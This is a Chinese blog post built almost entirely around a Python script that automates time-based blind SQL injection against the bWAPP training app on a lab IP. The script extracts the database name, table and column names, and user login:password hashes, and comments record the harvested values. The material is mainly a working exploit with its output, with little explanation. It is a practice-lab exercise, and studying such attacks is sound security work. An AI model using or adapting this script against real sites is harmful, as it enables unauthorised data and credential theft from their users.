SQL Injection-Blind-Time-Based(bWAPP)

已于 2023-07-06 02:21:02 修改
阅读量104 收藏
点赞数 1
分类专栏: SQL 时间盲注 python 文章标签: sql 数据库 python
于 2023-07-05 02:50:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liaochonxiang/article/details/131546651
版权
python 同时被 3 个专栏收录
20 篇文章 0 订阅
订阅专栏
SQL
2 篇文章 0 订阅
订阅专栏
时间盲注
1 篇文章 0 订阅
订阅专栏
该代码示例展示了如何通过SQL注入技术获取数据库名、表的数量和名称、字段的数量和名称以及特定字段的值。它利用了`requests`库发送HTTP请求,并通过延时(sleep)来判断查询是否成功。脚本主要用于教育目的,揭示了系统安全的重要性。
摘要由CSDN通过智能技术生成 
import time

import requests

HEADER = {"Cookie": "security_level=0; PHPSESSID=dh3ogo91r8urgsstkkc02n9g82"}

URL_START = "http://192.168.5.128:8070/sqli_15.php?title="
URL_LAST = " &action=search"


def get_database_name_length() -> int:
    # Iron Man' and length(database())=? and sleep(2) --
    count = 1
    for i in range(20):
        URL_MIDDLE = "Iron Man' and length(database())={} and sleep(2) --".format(i)
        url = URL_START + URL_MIDDLE + URL_LAST
        start_time = time.time()
        resp = requests.get(url, headers=HEADER)
        # print(resp.content)
        if time.time() - start_time > 1:
            print("数据库长度为{}".format(i))
            count = i
            break
    return count


def get_database_name(count):
    # Iron Man' and ascii(substr(database(),{},1))={} and sleep(2) --
    print('数据库名称为:', end='')
    for i in range(count + 1):
        for j in range(33, 128):
            URL_MIDDLE = "Iron Man' and ascii(substr(database(),{},1))={} and sleep(2) --".format(i, j)
            url = URL_START + URL_MIDDLE + URL_LAST
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            # print(resp.content)
            if time.time() - start_time > 1:
                print(chr(j), end='')
                break


def get_table_count() -> int:
    # Iron Man' and (select count(table_name) from information_schema.tables where table_schema=database())=? and sleep(2) --
    count = 1
    for i in range(20):
        URL_MIDDLE = "Iron Man' and (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(2) --".format(
            i)
        url = URL_START + URL_MIDDLE + URL_LAST
        start_time = time.time()
        resp = requests.get(url, headers=HEADER)
        if time.time() - start_time > 1:
            print('一共有{}个表'.format(i))
            count = i
            break
    return count


def get_table_length_of_each_table(count):
    # Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit ?,1 )=? and sleep(2) --
    for i in range(count + 1):
        for j in range(20):
            URL_MIDDLE = "Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={} and sleep(2) --".format(
                i, j)
            url = URL_START + URL_MIDDLE + URL_LAST
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 1:
                print('第{}个表的长度为{},表名为'.format(i + 1, j), end='')
                get_table_name_of_each_table(i, j)
                print()


def get_table_name_of_each_table(index, count):
    # Iron Man' and (select ascii(substr(table_name,{},1)) from information_schema.tables where table_schema=database() limit {},1)={} and sleep(2) --
    for i in range(count + 1):
        for j in range(33, 128):
            URL_MIDDLE = "Iron Man' and (select ascii(substr(table_name,{},1)) from information_schema.tables where table_schema=database() limit {},1)={} and sleep(2) --".format(
                i, index, j)
            url = URL_START + URL_MIDDLE + URL_LAST
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 1:
                print(chr(j), end='')


# 第1个表的长度为4,表名为blog
# 第2个表的长度为6,表名为heroes
# 第3个表的长度为6,表名为movies
# 第4个表的长度为5,表名为users
# 第5个表的长度为8,表名为visitors
def get_column_count() -> int:
    # Iron Man' and (select count(column_name) from information_schema.columns where table_name='users')={} and sleep(2) --
    count = 1
    for i in range(20):
        URL_MIDDLE = "Iron Man' and (select count(column_name) from information_schema.columns where table_name='users')={} and sleep(2) --".format(
            i)
        url = URL_START + URL_MIDDLE + URL_LAST
        start_time = time.time()
        resp = requests.get(url, headers=HEADER)
        if time.time() - start_time > 1:
            print('一共有{}个字段'.format(i))
            count = i
            break
    return count


def get_table_length_of_each_column(count):
    # Iron Man' and (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} and sleep(2) --
    for i in range(count + 1):
        for j in range(20):
            URL_MIDDLE = "Iron Man' and (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} and sleep(2) --".format(
                i, j)
            url = URL_START + URL_MIDDLE + URL_LAST
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 1:
                print('第{}个字段的长度为{},字段名为'.format(i + 1, j), end='')
                get_column_name_of_each_column(i, j)
                print()


def get_column_name_of_each_column(index, count):
    # Iron Man' and (select ascii(substr(table_name,{},1)) from information_schema.tables where table_schema=database() limit {},1)={} and sleep(2) --
    for i in range(count + 1):
        for j in range(33, 128):
            URL_MIDDLE = "Iron Man' and (select ascii(substr(column_name,{},1)) from information_schema.columns where table_name='users' limit {},1)={} and sleep(2) --".format(
                i, index, j)
            url = URL_START + URL_MIDDLE + URL_LAST
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 1:
                print(chr(j), end='')


# 一共有9个字段
# 第1个字段的长度为2,字段名为id
# 第2个字段的长度为5,字段名为login
# 第3个字段的长度为8,字段名为password
# 第4个字段的长度为5,字段名为email
# 第5个字段的长度为6,字段名为secret
# 第6个字段的长度为15,字段名为activation_code
# 第7个字段的长度为9,字段名为activated
# 第8个字段的长度为10,字段名为reset_code
# 第9个字段的长度为5,字段名为admin

table = 'users'
column = 'login'


def get_column_value_count() -> int:
    # Iron Man' and (select count(login) from users)={} and sleep(2) --
    count = 1
    for i in range(20):
        URL_MIDDLE = "Iron Man' and (select count({}) from {})={} and sleep(2) --".format(column, table, i)
        url = URL_START + URL_MIDDLE + URL_LAST
        start_time = time.time()
        resp = requests.get(url, headers=HEADER)
        if time.time() - start_time > 1:
            print('{}字段一共有{}个字段值'.format(column, i))
            count = i
            break
    return count


def get_table_length_of_each_column_value(count):
    # Iron Man' and (select length(login) from users limit {},1)={} and sleep(2) --
    for i in range(count + 1):
        for j in range(100):
            URL_MIDDLE = "Iron Man' and (select length({}) from {} limit {},1)={} and sleep(2) --".format(column, table,
                                                                                                          i, j)
            url = URL_START + URL_MIDDLE + URL_LAST
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 1:
                print('第{}个字段值的长度为{},字段值为'.format(i + 1, j), end='')
                get_column_name_of_each_column_value(i, j)
                print()
                break


def get_column_name_of_each_column_value(index, count):
    # Iron Man' and (select substr({},{},1) from users limit {},1)='{}' and sleep(2) --
    for i in range(count + 1):
        for j in range(33, 128):
            URL_MIDDLE = "Iron Man' and (select ascii(substr({},{},1)) from users limit {},1)={} and sleep(2) --".format(
                column,
                i, index, j)
            url = URL_START + URL_MIDDLE + URL_LAST
            start_time = time.time()
            resp = requests.get(url, headers=HEADER)
            if time.time() - start_time > 1:
                print(chr(j), end='')


# login字段一共有2个字段值
# 第1个字段值的长度为6,字段值为 A.I.M.
# 第2个字段值的长度为3,字段值为 bee
# password字段一共有2个字段值
# 第1个字段值的长度为40,字段值为6885858486f31043e5839c735d99457f045affd0
# 第2个字段值的长度为40,字段值为6885858486f31043e5839c735d99457f045affd0

def get_username_and_password():
    for k in range(2):
        for i in range(50):
            for j in range(33, 128):
                URL_MIDDLE = "Iron Man' and ascii(substr((select concat(login,':',password) from users limit {},1),{},1))={} and sleep(2) --".format(
                    k, i, j)
                url = URL_START + URL_MIDDLE + URL_LAST
                start_time = time.time()
                resp = requests.get(url, headers=HEADER)
                if time.time() - start_time > 1:
                    print(chr(j), end='')
    print()


if __name__ == '__main__':
    # get_database_name(get_database_name_length())
    # get_table_length_of_each_table(get_table_count())
    # get_table_length_of_each_column(get_column_count())
    # get_table_length_of_each_column_value(get_column_value_count())
    get_username_and_password()

liqingdi437
关注
专栏目录
基于时间的盲注
2301_77789826的博客
05-08 132
​ 时间盲注,通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。用到的函数为sleep()。
SQL Injection-Blind-Time-Based(bWAPP)注入思路
****的博客
08-23 1356
靶机:bWAPP bug:SQL Injection-Blind-Time-Based 难度等级:low 分析 无论输入什么字符串,都会返回“The result will be sent by e-mail...”。因此首先要确定该处是否存在注入。因此这里可以参考基于时间的注入方法。本文使用主要使用if(exp1,exp2,exp3)及sleep函数,根据网络的延迟去判断是否发生注入。 ...
bwapp通关(全完结)
热门推荐
hxhxhxhxx的博客
10-20 1万+
bwapp/ A1 - Injection /HTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL)HTML Injection - Stored (Blog)iFrame InjectionLDAP Injection (Search)【待开化】 ---------------------- bWAPP v2.2 -----------------
JuniorCTF - Web - blind
weixin_30273931的博客
01-19 509
题目链接 https://ctftime.org/task/7450 参考链接 https://github.com/Dvd848/CTFs/blob/master/2018_35C3_Junior/blind.md https://github.com/lukeflima/CTF-Writeups/tree/master/35c3%20Junior/blind 解题过程 转载于:https:/...
bWAPP SQL注入篇
angry_program的博客
03-03 7122
步骤 下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是整数型 2.猜解SQL查询语句中的字段数 (order by ) 3.确定显示的字段顺序 4.获取当前数据库 (爆库) 5.获取数据库中的表 (爆表) 6.获取表中的字段名 (爆字段) 7.下载数据 (爆数据) 0x01SQL Injection (GET/Search) ...
SQL Injection - Blind - Boolean-Based注入思路
****的博客
08-21 3720
靶机:bWAPP bug:SQL Injection - Blind - Boolean-Based 难度等级:low 这是基于布尔型的盲注。首先使用“Man of Steel”、“Man of Steel' and 1=1#”测试发现,返回的信息都为“The movie exists in our database!”,当输入“Man of Steel' and 1=2#”,返回 “The...
mysql基于时间盲注_MySQL基于时间盲注(Time-Based Blind SQL Injection)五种延时方法...
weixin_42527178的博客
01-19 958
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
Time-Based Blind SQL Injection using heavy queries- A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool
09-07
时间基盲注SQL注入是一种利用数据库查询响应时间差异来探测和执行SQL命令的技术。这种攻击方式在目标系统不返回具体错误信息或者数据时特别有效,适用于MS SQL Server、MS Access、Oracle和MySQL等常见数据库系统。...
sql注入-error、boolean、time-based and 宽字节
我不是大牛
06-24 1834
1、Error-based SQL injection 利用前提: 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysqli_error() 优点: 不需要显示位 缺点: 需要输出mysqli_error( )的报错信息 通过floor报错 select 列1(count()) , 列2(concat()随机数) as x from 表 group by x; select c...
简学-SQL注入(时间盲注)
码农米格的博客
02-09 988
简学SQL注入0x06 SQL注入的主要类型(从漏洞类型的角度) 0x06 SQL注入的主要类型(从漏洞类型的角度) SQL注入主要分为以下几种类型: 1、Boolean-based blind SQL injection(布尔型注入) http://test.com/view?id=1 and substring(version,1,1)=5 如果服务端 Mysql 版本是5.X的话,那么页面返回的内容就会和正常的请求一样。 2、UNION query SQL injection(可联合查
Lab: Blind SQL injection with time delays and information retrieval:时间延迟盲注和信息检索两个靶场复盘
Zeker62的博客
08-18 519
Lab: Blind SQL injection with time delays 时间延迟盲注靶场复盘 题目内容 This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The results of th
Blind SQL Injection
Nixawk
04-23 1378
https://www.owasp.org/index.php/Blind_SQL_Injection
navicate远程linux上的pgsql提示密码失败
最新发布
记录、分享、合作、共赢
09-14 183
2、postgresql.conf文件中,修改listen_addresses。3、重启pgsql,例如:systemctl restart pgsql。1、pg_hba.conf文件中,ipv4下面的内容改成。4、如果问题还在,检查firewalld防火墙,执行。5、再次尝试连接,成功!
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 510
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
SQL题目解析:外卖平台数据分析
天冬忘忧的博客
09-10 1216
在本次SQL中,我们将通过一系列查询来分析外卖平台的数据,包括用户、餐厅和订单信息。这些查询将帮助我们理解用户行为、餐厅表现和订单趋势。
SQL 代表什么?SQL 的全称是什么?
程序员学习园地。
09-09 1693
创建表修改表删除表。
基于SSM和VUE的药品管理系统(含源码+sql+视频导入教程+文档)
coderbu的博客
09-12 767
基于SSM和VUE的药品管理系统2拥有两种角色 管理员:药品管理、出库管理、入库管理、销售员管理、报损管理等 销售员:登录注册、入库、出库、销售、报损等
SQL(结构性查询语句)
2301_78693337的博客
09-11 409
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
利用X-Forwarded-For注入:时间盲注与SQL技巧
- 攻击者意识到常规的条件判断式(如`if-else`)可能被服务器的输入处理方式(如逗号`','`的过滤)所限制,因此转向了基于时间的盲注(time-based blind SQL injection)。通常这种类型的注入依赖于执行时间的变化...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值